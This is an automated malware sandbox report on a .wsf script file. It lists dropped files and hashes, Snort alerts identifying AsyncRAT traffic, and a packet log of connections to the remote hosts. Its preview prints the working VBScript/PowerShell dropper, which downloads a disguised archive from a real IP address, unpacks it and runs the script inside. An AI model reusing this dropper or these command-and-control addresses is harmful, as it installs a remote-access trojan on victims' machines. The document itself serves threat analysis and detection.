                                          SHA-256:F1E45CF3E26A813D9572E46FE6D7A7B4280CD63B15E636205212A029DEB7C88E
                                          SHA-512:FCB4F2C2A883B51264CE7687FFB4E5AB79230F030CE8834AA1D98B04690691BBD5FC456CD96825CCB29B3DF6D621382BEC2B55AD1A15E64A63914D89960E8247
                                          Malicious:false
                                          Preview:Set QPNRUZVYIDDMUFUW = WScript.CreateObject("WScript.Shell")..DSFHCCNROTFURVKP = "<command>" & _.. " <a>" & _.. " <execute>Start-BitsTransfer -Source ""http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg"" -Destination ""C:\Users\Public\sNGobbjhXGKsSanr.zip""; Expand-Archive -Path ""C:\Users\Public\sNGobbjhXGKsSanr.zip"" -DestinationPath ""C:\Users\Public\"" -Force; Start ""C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs""; Remove-Item -Path ""C:\Users\Public\sNGobbjhXGKsSanr.zip"" -Force</execute>" & _.. " </a>" & _.. "</command>"....Set ILGDKGWKRBCVFRRD = CreateObject("Scripting.FileSystemObject")..Set AXTKEDVJZQRYJAHD = ILGDKGWKRBCVFRRD.CreateTextFile("C:\Users\Public\NDKJPlEEYLhKqtGW.xml", True)..AXTKEDVJZQRYJAHD.Write DSFHCCNROTFURVKP..AXTKEDVJZQRYJAHD.Close....QPNRUZVYIDDMUFUW.Run "powershell -command ""[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command"""

                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):64
                                          Entropy (8bit):0.34726597513537405
                                          Encrypted:false
                                          SSDEEP:3:Nlll:Nll
                                          MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                          SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                          SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                          SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                          Malicious:false
                                          Preview:@...e...........................................................

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_21v1fdb1.2vi.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ckq5xyv.0vf.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_chhsuau2.n3v.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dwwbfurj.0vq.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ejgl5wik.22j.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fteecjwy.mar.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gmrbi3ho.xco.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqo1c1k2.bm4.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l4linno3.byb.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsicugn1.vwp.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mg1hrxor.sc4.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nh4qcw3k.ico.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nryrr5r3.xtl.ps1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oqwxf1nm.5fd.psm1

                                          Download File
                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.038920595031593
                                          Encrypted:false
                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                          Malicious:false
                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                          Static File Info

                                          General

                                          File type:Unicode text, UTF-8 text, with very long lines (2416), with CRLF line terminators
                                          Entropy (8bit):4.84849114176381
                                          TrID:
                                            File name:Summaryform_FXnbLLyKOJ.wsf
                                            File size:89'706 bytes
                                            MD5:75dc4de3834d7a713ca0e33c3d1c9b1b
                                            SHA1:7b197014208a3aadcadd571f4ced60eb4acbefdc
                                            SHA256:f8a6ff7847a05d31933deb7386190372bbe6a8af3bfde04b757731341d9ac4a3
                                            SHA512:e4ec1f0087f98b943dc342b584f2b57c928221668cf836c1d3cab062cb9d8f2cc289657d0b5f7f16655821c564de8637a0a409ea535c41b7da1e26d3de21070d
                                            SSDEEP:96:JABBBBBBBABBBG9999999xABBBBBBBABBBG9999999xABBBBBBBABBBG9999999C:fqaIGCBu7
                                            TLSH:3293B23CAE273ACD6730C17A10B161D6979378492364605BD63E7E65CF8B4B076FB222
                                            File Content Preview:.. ...... .. ........ ........ .... ...... ...... ................ .. ........ .......... .. .......... .. ........ .......... .. ...... ...... ...... ...... .. ........ ........ .... ...... ...... ................ .. ........ .......... .. ....

                                            File Icon

                                            Icon Hash:68d69b8f86ab9a86

                                            Network Behavior

                                            Snort IDS Alerts

                                            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                            03/14/24-16:35:17.108992TCP2035595ET TROJAN Generic AsyncRAT Style SSL Cert666649711103.195.101.9192.168.2.6
                                            03/14/24-16:35:17.108992TCP2030673ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server)666649711103.195.101.9192.168.2.6

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Mar 14, 2024 16:34:46.907365084 CET49699222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:47.098476887 CET22249699212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:47.098620892 CET49699222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:47.099097013 CET49699222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:47.290836096 CET22249699212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:47.290913105 CET22249699212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:47.291023970 CET49699222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:47.291062117 CET49699222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:52.292414904 CET22249699212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:52.292561054 CET49699222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:54.487396002 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:54.672761917 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:54.672868967 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:54.673120022 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:54.858664989 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:54.893635035 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.079904079 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.079967976 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.080007076 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.080044031 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.080049992 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.080080986 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.080101967 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.080120087 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.080167055 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.080267906 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.080303907 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.080362082 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.080375910 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.080424070 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.080482006 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.265543938 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.266215086 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.266235113 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.266247988 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.266262054 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.266263008 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.266274929 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.266288042 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.266298056 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.266329050 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.266468048 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.266511917 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.271177053 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.272048950 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.272067070 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.272082090 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.272093058 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.272123098 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.272649050 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.273128033 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.273143053 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.273170948 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.273313999 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.273328066 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.273365021 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.273655891 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.273670912 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.273683071 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.273713112 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.273749113 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.452423096 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.452503920 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.452547073 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.452585936 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.452605963 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.452631950 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.452656984 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.452672958 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.452709913 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.452738047 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.452745914 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.452785969 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.452795029 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.452824116 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.452862024 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.452893019 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.452899933 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.452944040 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.453097105 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.453135967 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.453174114 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.453211069 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.453217030 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.453262091 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.456700087 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.456756115 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.456811905 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.456831932 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.456902027 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.456938982 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.456954956 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.456990957 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.457061052 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.457098961 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.457108974 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.457156897 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.457794905 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.457830906 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.457922935 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.457954884 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.457961082 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458013058 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.458055973 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458127022 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458163023 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458256006 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458302975 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.458302975 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.458306074 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458376884 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458424091 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.458448887 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458518028 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458559036 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458591938 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.458635092 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458672047 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458681107 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.458715916 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.458846092 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.638052940 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.638274908 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.638314009 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.638335943 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.638354063 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.638392925 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.638406038 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:34:55.638504028 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:34:55.638714075 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:35:00.101567984 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:35:00.101773024 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:35:00.104646921 CET49703222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:35:00.289685011 CET22249703212.23.222.200192.168.2.6
                                            Mar 14, 2024 16:35:06.082894087 CET49699222192.168.2.6212.23.222.200
                                            Mar 14, 2024 16:35:16.831888914 CET497116666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:16.951502085 CET666649711103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:16.951627970 CET497116666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:16.985315084 CET497116666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:17.108992100 CET666649711103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:17.109117031 CET666649711103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:17.109170914 CET497116666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:17.119286060 CET497116666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:17.240009069 CET666649711103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:17.342572927 CET497116666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:22.515186071 CET497116666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:22.519052982 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:35:22.634943008 CET666649711103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:35:22.634965897 CET666649711103.195.101.9192.168.2.6
